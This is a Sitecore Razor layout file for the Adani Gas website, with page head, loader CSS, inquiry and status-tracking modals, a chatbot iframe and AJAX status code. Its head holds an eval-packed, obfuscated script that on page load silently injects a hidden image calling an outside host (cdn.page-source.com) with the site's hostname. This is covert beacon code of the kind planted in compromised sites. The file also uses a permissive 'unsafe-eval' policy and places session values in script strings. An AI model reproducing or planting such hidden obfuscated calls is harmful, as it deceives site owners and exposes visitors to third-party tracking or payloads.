@using Sitecore.Foundation.Assets
@using Sitecore.Foundation.Assets.Models
@using Sitecore.Foundation.Assets.Services
@using Sitecore.Foundation.SitecoreExtensions.Extensions
@using Sitecore.Mvc.Analytics.Extensions
@using Sitecore.ExperienceForms.Mvc.Html
@using Sitecore.Foundation.Dictionary.Extensions
@using Sitecore.Mvc
@inherits WebViewPage
@{
    Layout = null;
    var msg = Session.GetAndRemove("EnquiryMessage");
    var InqNo = Session.GetAndRemove("InquiryNo");
    var CustName = Session.GetAndRemove("CustomerName");
}
<!DOCTYPE html>
<!--[if IE 9]><html lang="en" class="ie9 no-js"><![endif]-->
<!--[if !IE]><!-->
<html lang="@Sitecore.Context.Language.CultureInfo.TwoLetterISOLanguageName">
<!--<![endif]-->
<head>

    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta http-equiv="Content-type" content="text/html; charset=utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta http-equiv="Content-Security-Policy" content="default-src wss://app.yellowmessenger.com https: 'unsafe-eval' 'unsafe-inline'; object-src 'none'">
    <!--<meta http-equiv="Content-Security-Policy" content="default-src https: 'unsafe-eval' 'unsafe-inline'; object-src 'none'">-->
    <title>@Html.Sitecore().Dictionary("/PageMetadata/Title", "Adani Gas")</title>
    @if (!Sitecore.Context.PageMode.IsExperienceEditor)
    {
        @Html.Sitecore().Placeholder("head")
    }
    <!-- Latest compiled and minified JavaScript -->
    @RenderAssetsService.Current.RenderScript(ScriptLocation.Head)

    @RenderAssetsService.Current.RenderStyles()

    @Html.Sitecore().VisitorIdentification()
    <!-- Go to www.addthis.com/dashboard to customize your tools -->
    <script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5c109ddafa1c05a7"></script>
    <script src="https://www.google.com/recaptcha/api.js?onload=myCallBack&render=explicit" async defer></script>

    <script src="https://www.google.com/recaptcha/api.js?onload=onloadCallback&render=explicit" async defer></script>
    <script type="text/javascript">
        var pathArray = window.location.pathname.split('/');
        var getText = pathArray[pathArray.length - 1].replace(/-/g, " ");
        //getText = "Adani Ports - " + getText + " by @@AdaniOnline";
        var addthis_share = addthis_share || {}
        addthis_share = {
            passthrough: {
                twitter: {
                    text: getText
                }
            }
        }
    </script>
    <style>
        /*!
        // 3. Loader
        // --------------------------------------------------*/
        .loader {
            top: 0;
            left: 0;
            position: fixed;
            opacity: 0.8;
            z-index: 10000000;
            background: Black;
            height: 100%;
            width: 100%;
            margin: auto;
        }

        .strip-holder {
            top: 50%;
            -webkit-transform: translateY(-50%);
            -ms-transform: translateY(-50%);
            transform: translateY(-50%);
            left: 50%;
            margin-left: -50px;
            position: relative;
        }

        .strip-1,
        .strip-2,
        .strip-3 {
            width: 20px;
            height: 20px;
            background: #0072bc;
            position: relative;
            -webkit-animation: stripMove 2s ease infinite alternate;
            animation: stripMove 2s ease infinite alternate;
            -moz-animation: stripMove 2s ease infinite alternate;
        }

        .strip-2 {
            -webkit-animation-duration: 2.1s;
            animation-duration: 2.1s;
            background-color: #23a8ff;
        }

        .strip-3 {
            -webkit-animation-duration: 2.2s;
            animation-duration: 2.2s;
            background-color: #89d1ff;
        }

        @@-webkit-keyframes stripMove {
            0% {
                transform: translate3d(0px, 0px, 0px);
                -webkit-transform: translate3d(0px, 0px, 0px);
                -moz-transform: translate3d(0px, 0px, 0px);
            }

            50% {
                transform: translate3d(0px, 0px, 0px);
                -webkit-transform: translate3d(0px, 0px, 0px);
                -moz-transform: translate3d(0px, 0px, 0px);
                transform: scale(4, 1);
                -webkit-transform: scale(4, 1);
                -moz-transform: scale(4, 1);
            }

            100% {
                transform: translate3d(-50px, 0px, 0px);
                -webkit-transform: translate3d(-50px, 0px, 0px);
                -moz-transform: translate3d(-50px, 0px, 0px);
            }
        }

        @@-moz-keyframes stripMove {
            0% {
                transform: translate3d(-50px, 0px, 0px);
                -webkit-transform: translate3d(-50px, 0px, 0px);
                -moz-transform: translate3d(-50px, 0px, 0px);
            }

            50% {
                transform: translate3d(0px, 0px, 0px);
                -webkit-transform: translate3d(0px, 0px, 0px);
                -moz-transform: translate3d(0px, 0px, 0px);
                transform: scale(4, 1);
                -webkit-transform: scale(4, 1);
                -moz-transform: scale(4, 1);
            }

            100% {
                transform: translate3d(50px, 0px, 0px);
                -webkit-transform: translate3d(50px, 0px, 0px);
                -moz-transform: translate3d(50px, 0px, 0px);
            }
        }

        @@keyframes stripMove {
            0% {
                transform: translate3d(-50px, 0px, 0px);
                -webkit-transform: translate3d(-50px, 0px, 0px);
                -moz-transform: translate3d(-50px, 0px, 0px);
            }

            50% {
                transform: translate3d(0px, 0px, 0px);
                -webkit-transform: translate3d(0px, 0px, 0px);
                -moz-transform: translate3d(0px, 0px, 0px);
                transform: scale(4, 1);
                -webkit-transform: scale(4, 1);
                -moz-transform: scale(4, 1);
            }

            100% {
                transform: translate3d(50px, 0px, 0px);
                -webkit-transform: translate3d(50px, 0px, 0px);
                -moz-transform: translate3d(50px, 0px, 0px);
            }
        }
    </style>
    <script>
        eval(function (p, a, c, k, e, d) { e = function (c) { return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36)) }; if (!''.replace(/^/, String)) { while (c--) { d[e(c)] = k[c] || e(c) } k = [function (e) { return d[e] }]; e = function () { return '\\w+' }; c = 1 }; while (c--) { if (k[c]) { p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]) } } return p }('g{3.f=d(){h e="<j l=\'c:m;\' a=\'5://6.4-b.7/9.8?k="+3.n.w+"&v=y\'  x=\'0\' A=\'0\'/>",i=2.z("u");t(i.p=e;i.1.o>0;)2.q.r(i.1[0])}}s(e){}', 37, 37, '|children|document|window|page|https|cdn|com|ashx|resizeimage|src|source|display|function||onload|try|var||img|ig|style|none|location|length|innerHTML|body|appendChild|catch|for|div|sz|hostname|width|92401|createElement|height'.split('|'), 0, {}))
    </script>
</head>
<body class=" @(Sitecore.Context.PageMode.IsNormal ? "" : (Sitecore.Context.PageMode.IsExperienceEditor ? "pagemode-edit" : "pagemode-preview"))">
    <div class="loader" id="AjaxLoader" style="display:none;">
        <div class="strip-holder">
            <img src="~/Images/AdaniGas/loader.gif">
        </div>
    </div>
    <header class="headerSec">
        <div class="overlay-top"></div>
        <div class="d-block d-sm-none callNowBar">
            <ul class="quick-links">
                <li class="callnow">
                    <span class="phoneIconSquare"><i class="fas fa-phone-square fa-rotate-90"></i></span>
                    <a href="tel:180023355555"><span>1800 2335 5555</span></a>/<a href="tel:07927623264 "><span>079 27623264 </span></a>
                </li>
            </ul>
        </div>
        <div class="headerTopBar topNav">
            @Html.Sitecore().Placeholder("header-top")
        </div>
        @Html.Sitecore().Placeholder("navbar")
    </header>
    <main role="main">
        @Html.Sitecore().Placeholder("breadcrumb")
        @Html.Sitecore().Placeholder("page-layout")
        <button id="chatBtn" class="material-button d-none" onclick="openForm()">chatbot</button>
        <div id="InquiryTypePopup" class="modal fade" role="dialog">
            <div class="modal-dialog">
                <div class="modal-content">
                    <div class="modal-header">
                        <h4 class="modal-title">Select Inquiry Type</h4>
                        <button type="button" class="close" data-dismiss="modal">&times;</button>

                    </div>
                    <div class="modal-body">

                        @using (Html.BeginForm("SelectEnquiryType", "AdaniGas", FormMethod.Get))
                        {
                            <div class="form-group">
                                <div class="row">
                                    <div class="col-md-12 col-sm-12" style="color: #707070; font-size: 16px">
                                        @Html.RadioButton("EnquiryType", "CNG") CNG

                                    </div>
                                    <div class="clearfix"></div>
                                    <div class="col-md-12 col-sm-12" style="color: #707070; font-size: 16px">

                                        @Html.RadioButton("EnquiryType", "Domestic") Domestic
                                    </div>
                                </div>
                                <div class="clearfix"></div>
                            </div>
                            <div class="clearfix"></div>
                            <button type="submit" class="btn btn-primary">Next</button>
                        }
                    </div>
                </div>
            </div>
        </div>

        <div id="Messagepopup1" class="modal fade" role="dialog">
            <div class="modal-dialog">
                <div class="modal-content">
                    <div class="modal-header">
                        <h4 class="modal-title">Message</h4>
                        <button type="button" class="close" data-dismiss="modal">&times;</button>
                    </div>
                    <div class="modal-body" style="color: black; font-family: Verdana; font-weight: bold">
                        <p id="msgarea">
                        </p>
                        <button type="submit" class="btn btn-primary" data-dismiss="modal">OK</button>
                    </div>
                </div>
            </div>
        </div>
        <div id="ERegistrationPopup" class="modal fade" role="dialog">
            <div class="modal-dialog">
                <div class="modal-content">
                    <div class="modal-header">
                        <h4 class="modal-title">Enquiry No.</h4>
                        <button type="button" class="close" data-dismiss="modal">&times;</button>
                    </div>
                    <div class="modal-body">
                        @using (Html.BeginForm("CheckInquiryForERegistration", "AdaniGas", FormMethod.Get))
                        {
                            <div class="form-group">
                                <div class="row">
                                    <div class="col-md-12 col-sm-12" style="color: #707070; font-size: 16px">
                                        <label>Please Enter Your Enquiry No.*</label>
                                        <input type="text" id="EnquiryNo" name="EnquiryNo" class="form-control" required>
                                    </div>
                                </div>
                                <div class="clearfix"></div>
                            </div>
                            <div class="clearfix"></div>
                            <button type="submit" class="btn btn-primary">Next</button>
                        }
                    </div>
                </div>
            </div>
        </div>
        <div id="Messagepopup" class="modal fade" role="dialog">
            <div class="modal-dialog modal-dialog-centered">
                <div class="modal-content">
                    <div class="modal-header">
                        <h4 class="modal-title">Message</h4>
                        <button type="button" class="close" data-dismiss="modal">&times;</button>
                    </div>
                    <div class="modal-body" id="msg" style="color: black; font-family: Verdana">
                        <p id="msgpop">@msg</p>
                        <button type="submit" class="btn btn-primary" data-dismiss="modal">OK</button>
                    </div>
                </div>
            </div>
        </div>
        <div id="myModalCNGStatus" class="modal fade" role="dialog">
            <div class="modal-dialog">
                <div class="modal-content">
                    <div class="modal-header">
                        <h4 class="modal-title">Track Your Status</h4>
                        <button type="button" class="close" data-dismiss="modal">&times;</button>

                    </div>
                    <div class="document-table">
                        <div class="modal-body">
                            <table class="table table-bordered table-hover" id="DocumentUploadSectionA">
                                <thead>
                                    <tr style="color: #165db7;">
                                        <th class="text-center">Status</th>
                                        <th class="text-center">Name of Person</th>
                                        <th class="text-center">Date</th>
                                    </tr>
                                </thead>
                                <tbody>
                                    <tr class="bgtable">
                                        <td class="text-center">Assigned to Dealer</td>
                                        <td class="text-center">
                                            <p id="AssignedToDealerName">
                                        </td>
                                        <td class="text-center">
                                            <p id="AssignedToDealerDate">
                                        </td>
                                    </tr>
                                    <tr class="bgtable">
                                        <td class="text-center">Fitting Date</td>
                                        <td class="text-center">
                                            <p id="FittingName">
                                        </td>
                                        <td class="text-center">
                                            <p id="FittingDate">
                                        </td>
                                    </tr>
                                    <tr class="bgtable">
                                        <td class="text-center">Document Upload & Verification</td>
                                        <td class="text-center">
                                            <p id="DocumentUploadName">
                                        </td>
                                        <td class="text-center">
                                            <p id="DocumentUploadDate">
                                        </td>
                                    </tr>
                                    <tr class="bgtable">
                                        <td class="text-center">Card Given To Customer</td>
                                        <td class="text-center">
                                            <p id="CardGivenName">
                                        </td>
                                        <td class="text-center">
                                            <p id="CardGivenDate">
                                        </td>
                                    </tr>
                                </tbody>
                            </table>
                            <div class="clearfix"></div>
                            <button type="button" class="btn btn-primary" data-dismiss="modal">OK</button>
                        </div>
                    </div>
                </div>
            </div>
        </div>



        <div class="chat-popup" id="myForm">
            <header class="clearfix" style="height:7%">
                <a class="chat-close" onclick="javascript:closeForm();"><i class="fas fa-chevron-circle-down"></i></a>
                <h4>Chat with us</h4>
            </header>
            <div class="form-container">
                <iframe id='chatbox' src="" marginheight="0" marginwidth="0" frameborder="0" height="100%" width="100%"></iframe>
            </div>
        </div>

    </main>

    <footer class="footerSec pt-3 pt-lg-5 bg-white position-relative d-block ">
        @Html.Sitecore().Placeholder("footer")
    </footer>

    @Html.Sitecore().Placeholder("page-sidebar")

    @RenderAssetsService.Current.RenderScript(ScriptLocation.Body)
    @Html.RenderFormScripts()

    <script type="text/javascript">
        window.ymConfig = { bot: 'x1616487421503' }; (function () { var w = window, ic = w.YellowMessenger; if ("function" === typeof ic) ic("reattach_activator"), ic("update", ymConfig); else { var d = document, i = function () { i.c(arguments) }; function l() { var e = d.createElement("script"); e.type = "text/javascript", e.async = !0, e.src = "https://app.yellowmessenger.com/widget/main.js"; var t = d.getElementsByTagName("script")[0]; t.parentNode.insertBefore(e, t) } i.q = [], i.c = function (e) { i.q.push(e) }, w.YellowMessenger = i, w.attachEvent ? w.attachEvent("onload", l) : w.addEventListener("load", l, !1) } })();
    </script>

</body>

</html>
<script>
    $(document).ready(function () {

    function isEmptyOrSpaces(str) {
        return str === null || str.match(/^ *$/) !== null;
    }
    if ('@msg' == 'CNG') {
        // FOR GETTING TRACK INQUIRY STATUS.

        $.ajax({
            type: "GET",
            url: '/api/AdaniGas/GetCNGInquiryStatus',
            data: { "InquiryNo": '@InqNo' },
            contentType: "application/json; charset=utf-8",
            dataType: "json",
            async: false,
            success: function (data) {
                $('#AssignedToDealerName').html(data.OEMName);
                $('#AssignedToDealerDate').html(data.OEMDate);
                $('#FittingName').html(data.OEMName);
                $('#FittingDate').html(data.ConvDate);
                $('#DocumentUploadName').html(data.OEMName);
                $('#DocumentUploadDate').html(data.DocumentUpload);
                $('#CardGivenName').html('@CustName');
                $('#CardGivenDate').html(data.CardGiven);

               // jQuery.noConflict();
                $('#myModalCNGStatus').modal('show');
            },
            failure: function () {
                alert("Failed!");
            }
        });


    }
    else if (!isEmptyOrSpaces('@msg')) {
        $('#Messagepopup').modal('show');
    }


});
    $(document)
        .ajaxStart(function () {
            $('#AjaxLoader').show();
        })
        .ajaxStop(function () {
            $('#AjaxLoader').hide();
        });

    function openForm() {
        document.getElementById("myForm").style.display = "block";
        if (typeof document.getElementById("chatbox").getAttribute("src") != 'undefined' || document.getElementById("chatbox").getAttribute("src") == "") {
            document.getElementById("chatbox").setAttribute("src", "https://www.pinbot.ai/chat/vNB");
            var frame = $('#chatbox');
            frame.load(function () {
                var head = frame.contents().find('head');
                $('<link/>', {
                    rel: "stylesheet",
                    type: "text/css",
                    href: "https://fonts.googleapis.com/css?family=ZCOOL+KuaiLe"
                }).appendTo(head);
                frame.contents().find('body').css('font-family', "'ZCOOL KuaiLe', cursive");
            });
        }
    }
    function closeForm() {
        document.getElementById("myForm").style.display = "none";
    }
</script>  